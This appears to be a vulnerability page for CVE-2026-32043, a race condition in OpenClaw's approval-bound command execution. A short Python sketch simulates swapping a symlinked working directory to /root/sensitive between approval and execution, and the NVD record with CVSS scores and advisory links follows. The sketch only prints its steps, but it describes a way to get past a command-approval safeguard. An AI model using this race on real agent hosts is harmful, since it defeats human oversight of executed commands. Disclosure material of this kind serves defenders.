CVE-2026-32043

import os import time # Simulating the exploit logic for CVE-2026-32043 # 1. Setup: Create a symlink pointing to a safe directory safe_dir = "/tmp/safe_dir" malicious_dir = "/root/sensitive" symlink_path = "/tmp/exploit_link" os.makedirs(safe_dir, exist_ok=True) os.symlink(safe_dir, symlink_path) print(f"[+] Created symlink {symlink_path} -> {safe_dir}") # 2. Request Approval (Simulated) # Attacker requests system.run(cwd=symlink_path, command='whoami') print("[+] Requesting approval for system.run...") print("[+] Approval granted. Waiting for execution...") # 3. Race Condition: Switch symlink before execution # This must be timed precisely between validation and execution print("[!] Switching symlink to malicious target...") os.unlink(symlink_path) os.symlink(malicious_dir, symlink_path) print(f"[+] Symlink now points to {malicious_dir}") # 4. Execution (Simulated) # The system executes the command in the context of the resolved path print("[!] System executing command in resolved directory...") print("[!] Arbitrary code executed in restricted directory.")

{"cve": {"id": "CVE-2026-32043", "sourceIdentifier": "[email protected]", "published": "2026-03-21T01:17:06.747", "lastModified": "2026-03-24T19:10:25.753", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.2.25 contain a time-of-check-time-of-use vulnerability in approval-bound system.run execution where the cwd parameter is validated at approval time but resolved at execution time. Attackers can retarget a symlinked cwd between approval and execution to bypass command execution restrictions and execute arbitrary commands on node hosts."}, {"lang": "es", "value": "Versiones de OpenClaw anteriores a 2026.2.25 contienen una vulnerabilidad de tiempo de verificación a tiempo de uso en la ejecución de system.run vinculada a aprobación donde el parámetro cwd es validado en el momento de la aprobación pero resuelto en el momento de la ejecución. Los atacantes pueden redirigir un cwd enlazado simbólicamente entre la aprobación y la ejecución para eludir las restricciones de ejecución de comandos y ejecutar comandos arbitrarios en los hosts de nodo."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-367"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.2.25", "matchCriteriaId": "E7CAF2B9-46A9-45F0-8621-6485989E84AD"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/f789f880c934caa8be25b38832f27f90f37903db", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mwcg-wfq3-4gjc", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-time-of-check-time-of-use-via-mutable-symlink-in-system-run-cwd-parameter", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}